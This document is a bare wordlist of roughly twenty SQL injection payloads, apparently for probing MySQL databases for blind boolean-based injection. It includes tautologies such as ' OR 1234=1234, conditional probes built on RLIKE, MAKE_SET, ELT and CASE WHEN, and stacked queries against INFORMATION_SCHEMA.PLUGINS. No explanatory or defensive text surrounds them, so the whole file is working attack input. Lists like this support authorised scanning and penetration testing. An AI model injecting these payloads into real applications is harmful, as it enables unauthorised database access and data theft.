' AND 1234=1234
' OR 1234=1234
' OR NOT 1234=1234
' and 1234=1234 and 'abracadabra'='abracadabra
' RLIKE (SELECT (CASE WHEN (1234=1234) THEN 'abracadabra' ELSE 0x28 END))
' AND MAKE_SET(1234=1234,1235)
' OR MAKE_SET(1234=1234,1235)
AND ELT(1234=1234,1235)
OR ELT(1234=1234,1235)
AND (1234=1234)*1235
OR (1234=1234)*1235
MAKE_SET(1234=1234,1235)
MAKE_SET(1234=1234,'abracadabra')
ELT(1234=1234,1235)
ELT(1234=1234,'abracadabra')
(1234=1234)*1235
(1234=1234)*'abracadabra'
(CASE WHEN (1234=1234) THEN 1234 ELSE 1234*(SELECT 1234 FROM DUAL UNION SELECT 1235 FROM DUAL) END)
,(SELECT (CASE WHEN (1234=1234) THEN 1 ELSE 1234*(SELECT 1234 FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN (1234=1234) THEN 'abracadabra' ELSE 1234*(SELECT 1234 FROM INFORMATION_SCHEMA.PLUGINS) END))
;SELECT (CASE WHEN (1234=1234) THEN 1234 ELSE 1234*(SELECT 1234 FROM INFORMATION_SCHEMA.PLUGINS) END)
;SELECT (CASE WHEN (1234=1235) THEN 1234 ELSE 1234*(SELECT 1234 FROM INFORMATION_SCHEMA.PLUGINS) END)